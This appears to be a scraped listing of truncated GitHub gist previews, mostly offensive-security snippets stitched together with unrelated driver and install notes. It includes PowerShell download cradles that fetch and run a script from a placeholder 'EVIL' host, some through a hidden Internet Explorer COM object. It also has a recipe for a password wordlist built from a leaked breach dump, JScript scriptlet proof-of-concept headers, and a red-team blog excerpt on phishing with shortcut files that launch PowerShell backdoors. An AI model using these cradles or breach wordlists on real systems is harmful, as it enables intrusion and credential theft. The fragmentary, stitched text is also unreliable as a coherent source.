This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wordlist created from original 41G stash via: | |
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt | |
Then, compressed with: | |
7z a breachcompilation.txt.7z breachcompilation.txt | |
Size: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
D.UIJN.NL | |
that's me! | |
DECEMBER 28, 2016UNCATEGORIZED | 0 COMMENT | |
Shortcuts: another neat phishing trick | |
Recently I read a blog about a Locky campaign using windows shortcut files to infect users. The microsoft blog describes a large scale phishing attack send Windows shortcut files in zip archives. For more inforamtion see: The TechNet blog.. The trick revolves around the fact that cmd.exe and powershell.exe both allow for commands passed via arguments. Creating a shortcut with the command parameters included will allow for powershell exectuion with a double click. | |
We do allot of phishing attacks and for all the backdoor related stuff we rely heavily on office macro’s using PowerShell. Or one of the available script formats like .js/.wsf/.jse/.hta etc etc. The issue is that organisations are disabling macro’s via the group policy and script files are being blocked via web/e-mail channels. If you haven’t blocked the execution of Macro’s via the command line look at this. | |
The Locky campaign used a download an |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W | |
The core version of the Re4son-Kernel is included in Kali Linux >= 2017.3. | |
On this site, I publish the latest version with these additional features: | |
Sticky Finger's Kali-Pi | |
Natively compiled | |
Includes kernel headers | |
Support for all common TFT screens | |
Ethernet gadget support | |
Latest Nexmon drivers with -m6 & -m7 support |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
ALFA WiFi USB Support MacOS 10.13 ( High Sierra) Model List | |
**2017/12/5 Updated News: Here come AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH, AWUS036ACM, Tube-UN, UBDo-25, UBDo-n Mac OS X 10.13 driver. Download Driver: Mac 10.13** | |
**2017/11/28 Updated Note: AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH and AWUS036ACM ONLY work if you already installed in Mac OS X 10.12 and upgrade to Mac OS X 10.13. If the NEW Mac OS X 10.13 system, it will not work ** | |
Note: MacOS 10.13 use the same MacOS 10.12 driver, therefore, please check MacOS 10.12 driver page, here is the link Mac OS X 10.12 driver link | |
Tips: If you don't see Alfa Utility icon on the top right system tray, you can go to Applications to find ALFA Wireless Utility folder and click "ALFA Wireless Utility" icon to enable Alfa Utility | |
Posted 23rd October 2017 by ALFA NETWORK |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Lots of ways to trigger HTA in iexplore.exe 😀 | |
{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B} | |
Try .mhtml for example. No mime type. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Go to the profile of Kevin Beaumont | |
Kevin BeaumontFollow | |
InfoSec, from the trenches of reality. Email kevin.beaumont@gmail.com | Twitter: @gossithedog on Twitter. | |
Mar 19, 2017 | |
RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation | |
How you can very easily use Remote Desktop Services to gain lateral movement through a network, using no external software — and how to defend against it. | |
Alexander Korznikov demonstrates using Sticky Keys and tscon to access an administrator RDP session — without even logging into the server. | |
Brief background on RDP session connection |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Update your Windows 10 machine. Open an administrative PowerShell window and install the Windows Subsystem with this one-liner. A reboot will be required once finished. | |
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux | |
2. Once rebooted, open a command line shell and run the following commands to install the default Ubuntu environment. This will lay down the foundations for our Kali install. | |
lxrun /install | |
3. Setup and install the WSL Switcher, download a Kali base, and extract it to disk: | |
git clone https://github.com/RoliSoft/WSL-Distribution-Switcher.git | |
cd WSL-Distribution-Switcher |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Bandit" | |
progid="Bandit" | |
version="1.00" | |
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
> |
OlderNewer